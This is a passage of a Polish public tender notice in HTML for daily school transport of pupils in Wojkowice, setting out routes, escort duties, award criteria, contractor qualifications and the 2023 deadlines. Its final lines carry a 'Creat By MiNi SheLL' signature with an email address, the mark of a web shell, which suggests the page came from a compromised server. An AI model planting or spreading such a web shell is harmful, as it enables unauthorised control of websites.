ZDARZENIA, JAKIEGOKOLWIEK TYPU, W KTÓRYCH WYNIKU NASTĄPI USZKODZENIE CIAŁA, ŚMIERĆ CZY SZKODA MATERIALNA, SPOWODOWANA DZIAŁALNOŚCIĄ WYKONAWCY. WYKONAWCA ZAMÓWIENIA MUSI JE REALIZOWAĆ ZGODNIE Z PRZEPISAMI PRAWA, A W SZCZEGÓLNOŚCI W ZGODZIE Z USTAWĄ Z DNIA 6 WRZEŚNIA 2001 R. O TRANSPORCIE DROGOWYM (T.J. DZ.U.2022.2201 Z DNIA 2022.10.27Z PÓŹN. ZM.) ORAZ USTAWĄ Z DNIA 20 CZERWCA 1997 PRAWO O RUCHU DROGOWYM (TJ. DZ.U.2023.1047 Z DNIA 2023.06.01 Z PÓŹN. ZM).<br/>1.11 Usługa musi być świadczona pojazdem posiadającym aktualne obowiązkowe ubezpieczenie OC i NW, aktualne badania techniczne dopuszczające pojazd do ruchu.<br/><br/>Szacowana liczba dni realizacji usługi: 207 – pkt. 2a<br/>Szacowana liczba dni realizacji usługi: 182 – pkt. 2b </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria:<br/>1.1. Cena brutto: 60 punktów<br/>1.2. Rok produkcji pojazdu: 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis zamówienia: <br/>Dowóz 42 uczniów do Szkoły Podstawowej nr 3 w Wojkowicach według wyznaczonej trasy wraz z zapewnieniem im opieki:<br/><br/>1.Trasa rozpoczyna się na ul. Jana III Sobieskiego nr domu 500 (przystanek autobusowy Kamyce, Posesja 500) i biegnie w kierunku Szkoły Podstawowej nr 3 <br/>w Wojkowicach na trasie określonej w załączniku nr 11 - mapka.<br/><br/>a) szacowana dzienna długość trasy, obejmująca dowóz i odwóz wynosi ok.: 13 km.<br/><br/>b) Przewoźnik zatrzymuje się na przystankach komunikacji miejskiej, ale powinien przewidzieć co najmniej 4 przystanki na żądanie.<br/><br/>c) Planowane godziny:<br/>dowóz: przed rozpoczęciem zajęć lekcyjnych rano ok. godz. 7.20 - wyjazd <br/>z przystanku najbliższego posesji nr 500 przy ul. Jana III Sobieskiego do ok. godz. 7.50 – przyjazd do Szkoły Podstawowej nr 3 w Wojkowicach.<br/>Odwóz: po zajęciach lekcyjnych od ok. godz. 13.30.<br/>1.1 Uczniowie będą wożeni zgodnie z kalendarzem roku szkolnego placówki, do której uczęszczają, w terminie od dnia 4 września 2023r. do 21 czerwca 2024 r., najkrótszą trasą miejsce odbioru – placówka oświatowa – miejsce odbioru.<br/>1.2 Uczniowie będą odbierani z miejsca wyznaczonego postoju, w czasie gwarantującym ich dowóz do Szkoły Podstawowej nr 3 w Wojkowicach na określoną godzinę, wynikającą z planu lekcyjnego. Odbiór uczniów ze szkoły będzie następował po zakończeniu zajęć lekcyjnych.<br/>1.3 Pojazd wożący uczniów musi być ubezpieczony zgodnie z ustawą z dnia 20 czerwca 1997 Prawo o ruchu drogowym ( tj. Dz.U.2023.1047 z dnia 2023.06.01 z późn. zm.)<br/><br/>1.4 Oprócz kierowcy, w pojeździe, powinien jechać z uczniami przygotowany do tej pracy opiekun, zgodnie z art. 39 ustawy Prawo oświatowe, który sprawować będzie opiekę nad uczniami w czasie transportu, zapewni pomoc w przemieszczaniu się pomiędzy domem/szkołą a środkiem transportu, wykona niezbędne czynności opiekuńcze, a w razie potrzeby udzieli pierwszej pomocy przedmedycznej. Osoba ta musi posiadać ukończony kurs „pierwszej pomocy przedmedycznej”. <br/>1.5 Wykonawca zobowiązany jest do sprawowania opieki nad dowożonymi uczniami do momentu przekazania ich pod opiekę uprawnionego pracownika placówki oświatowej, do której uczeń uczęszcza, a w przypadku transportu do domu do momentu oddania pod opiekę pełnoletniego opiekuna. <br/>1.6 Ze względu na możliwą zmianę liczbę dowożonych uczniów samochód powinien mieć przynajmniej 5 miejsca rezerwowe.<br/>1.7 Przed przystąpieniem do realizacji usługi Wykonawca ustali optymalny rozkład dla poszczególnych kursów, wskazujący trasę przejazdu oraz czas odbioru uczniów mając na uwadze konieczność dowiezienia uczniów do placówki zgodnie z planem ich zajęć oraz możliwie najkrótszy czas przebywania uczniów w podróży. Rozkład kursów Wykonawca ustali w porozumieniu z dyrektorem Szkoły Podstawowej nr 3 w Wojkowicach w dniu podpisania umowy.<br/>1.8 WYKONAWCA GWARANTUJE BEZPIECZEŃSTWO OSÓB I MIENIA PODCZAS WYKONYWANIA USŁUG PRZEWOZU UCZNIÓW. ZAMAWIAJĄCY NIE BIERZE ŻADNEJ ODPOWIEDZIALNOŚCI ZA WYPADKI, ZDARZENIA, JAKIEGOKOLWIEK TYPU, W KTÓRYCH WYNIKU NASTĄPI USZKODZENIE CIAŁA, ŚMIERĆ CZY SZKODA MATERIALNA, SPOWODOWANA DZIAŁALNOŚCIĄ WYKONAWCY. WYKONAWCA ZAMÓWIENIA MUSI JE REALIZOWAĆ ZGODNIE Z PRZEPISAMI PRAWA, A W SZCZEGÓLNOŚCI W ZGODZIE Z USTAWĄ Z DNIA 6 WRZEŚNIA 2001 R. O TRANSPORCIE DROGOWYM (TJ. DZ.U.2022.2201 Z DNIA 2022.10.27 Z PÓŹN. ZM.) ORAZ USTAWĄ Z DNIA 20 CZERWCA 1997 PRAWO O RUCHU DROGOWYM (TJ. DZ.U.2023.1047 Z DNIA 2023.06.01 Z PÓŹN. ZM.).<br/>1.9 Usługa musi być świadczona pojazdem posiadającym aktualne obowiązkowe ubezpieczenie OC i NW, aktualne badania techniczne dopuszczające pojazd do ruchu.<br/>Szacowana liczba dni realizacji usługi: 182. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria:<br/>1.1. Cena brutto: 60 punktów<br/>1.2. Rok produkcji pojazdu: 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ustawy.<br/>1.	Zdolność do występowania w obrocie prawnym<br/>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>2.	Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej o ile wynika to z odrębnych przepisów.<br/>Wykonawca musi posiadać licencję na wykonywanie krajowego transportu drogowego osób, ważną na cały okres wykonywania zamówienia.<br/>3.	Zdolność techniczna i zawodowa.<br/>3.1.	Wykonawca musi dysponować osobami, które będą uczestniczyć w realizacji zamówienia:<br/>a)	Kierowca – 1 osoba, posiadająca odpowiednie uprawnienia do kierowania pojazdem;<br/>b)	Opiekun – 1 osoba, posiadająca uprawnienia do udzielania pierwszej pomocy przedmedycznej.<br/>3.2.	Wykonawca musi dysponować narzędziami do wykonania zamówienia – 1 pojazd posiadający co najmniej tyle miejsc siedzących ile wskazano w opisie przedmiotu zamówienia dla poszczególnej części, posiadający ważne badanie techniczne oraz ubezpieczenie.<br/>3.3.	Wykonawca musi posiadać wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia. Wykonawca spełni warunek udziału w postępowaniu, jeżeli wykaże, że wykonał należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował lub realizuje usługę polegającą na dowozie uczniów do szkół przez okres minimum 6 miesięcy.<br/>Uwaga:<br/>Wykonawca składający ofertę na więcej niż jedną część zamówienia nie może posłużyć się tymi samymi osobami, ani tymi samymi pojazdami dla wykazania spełniania warunku określonego w pkt. 3.1. i 3.2.<br/>4. Sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełnienia warunków udziału w postępowaniu o udzielenie zamówienia zostanie wezwany do złożenia następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/>1.	Licencja na wykonywanie krajowego transportu drogowego osób, ważna na cały okres wykonywania zamówienia.<br/>2.	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego wg wzoru stanowiącego załącznik do SWZ). Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że dysponuje kierowcą posiadającym wymagane kwalifikacje do kierowania pojazdami umożliwiające realizację usługi oraz opiekunem. Opiekun, zgodnie z art. 39 ustawy Prawo oświatowe musi posiadać ukończony kurs pierwszej pomocy przedmedycznej. <br/>W wykazie należy podać: Imię i nazwisko opiekuna oraz kierowcy, a także kategorię posiadanych przez niego uprawnień do kierowania pojazdami / ukończone kursy opiekuna<br/>3.	Wykaz narzędzi – wykaz pojazdów, którymi wykonawca dysponuje. Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego: markę samochodu, model, nr rejestracyjny oraz ilość miejsc siedzących na podstawie dowodu rejestracyjnego, rok produkcji, podstawa dysponowania pojazdem, data ważności badania technicznego, ubezpieczenie pojazdu z datą ważności polisy (sporządzonego wg wzoru stanowiącego załącznik do SWZ). Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że wskazane pojazdy posiadają liczbę miejsc siedzących zgodną z wymogami wskazanymi w opisie przedmiotu zamówienia oraz tam, gdzie jest to wymagane pojazdy są przeznaczone do przewozu osób niepełnosprawnych w zakresie wskazanym w opisie przedmiotu zamówienia.<br/>4.	Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (sporządzonego wg wzoru stanowiącego załącznik do SWZ) wraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie potwierdzające brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu, składa każdy z wykonawców.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia umowę regulującą współpracę tych<br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy <br/>w niżej wymienionych przypadkach:<br/>a) zmiana adresu/siedziby/konta/firmy Zamawiającego/Wykonawcy,<br/>b) zmiana osób występujących po stronie Zamawiającego/Wykonawcy,<br/>c) zmiana będąca skutkiem poprawy oczywistej omyłki,<br/>d) zmiany w planie zajęć placówek oświatowych, do których dowożone są dzieci,<br/>e) zmiana osób realizujących zamówienie ze strony Wykonawcy (opiekunów lub/i kierowców)<br/>f) zmiana środków transportu, którymi wykonywane są zadania w trakcie realizacji zamówienia.<br/>2. Inne zmiany:<br/>a) Zmiana cen: cena jednostkowa za 1 kurs przewozu nie może być wyższa lub niższa niż podana w ofercie przez cały okres obowiązywania umowy z zastrzeżeniem następujących przypadków:<br/> - dopuszcza się na wniosek Wykonawcy kwartalną waloryzację ceny za 1 kurs przewozu, wynikający ze zmiany cen materiałów lub kosztów związanych z realizacją zamówienia <br/>w stosunku do ceny ww. uwzględnionej w cenie za 1 kurs zawartej w ofercie, w oparciu <br/>o wskaźnik wzrostu cen towarów i usług konsumpcyjnych ogółem w danym kwartale, podawany przez Prezesa Głównego Urzędu Statystycznego, ogłaszany <br/>w Dzienniku Urzędowym R.P. „Monitor Polski” aktualnego na dzień złożenia wniosku;<br/>- przez zmianę ceny materiałów lub kosztów rozumie się wzrost odpowiednio cen lub kosztów, jak i ich obniżenie, względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie, przedłożonych przez Wykonawcę przed zawarciem umowy, w postaci kalkulacji cenowych;<br/>- wzrost wynagrodzenia na podstawie wskaźnika cen towarów i usług, o którym mowa <br/>w tirecie 1 może obejmować tylko zmianę cen materiałów lub kosztów związanych <br/>z realizacją zamówienia w zakresie usług objętych przedmiotem zamówienia, które powinny zostać wykazane przez Wykonawcę. Strony poniosą koszty wzrostu wynagrodzenia w równych częściach (tj. po 50%);<br/>- zmiana wynagrodzenia odnosić się będzie do tej części przedmiotu umowy, która jeszcze nie została zrealizowana (działa na przyszłość od momentu dokonania zamiany).<br/>Warunkiem zastosowania waloryzacji jest wzrost tego wskaźnika ponad 3% w stosunku kwartał do poprzedniego kwartału,<br/><br/>b) Zamawiający na podstawie art. 455 ustawy prawo zamówień publicznych dopuści zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy również w następujących sytuacjach:<br/> - zmiana ustawowej stawki VAT – w takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie podatku,<br/>- gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia.<br/> - gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art.3571Kc.<br/>- zmiany powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację umowy po dacie jej podpisania.<br/>3. Określa się następujący tryb dokonywania zmian postanowień umowy:<br/>a) Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany, niezwłocznie po zajściu okoliczności uzasadniającej zmianę,<br/>b) Zamawiający informuje Wykonawcę o zaistniałej zmianie, niezwłocznie po zajściu okoliczności uzasadniającej zmianę.<br/>4. Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.). <br/>5. W rezultacie dokonania czynności opisanych powyżej może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-11 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-11 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com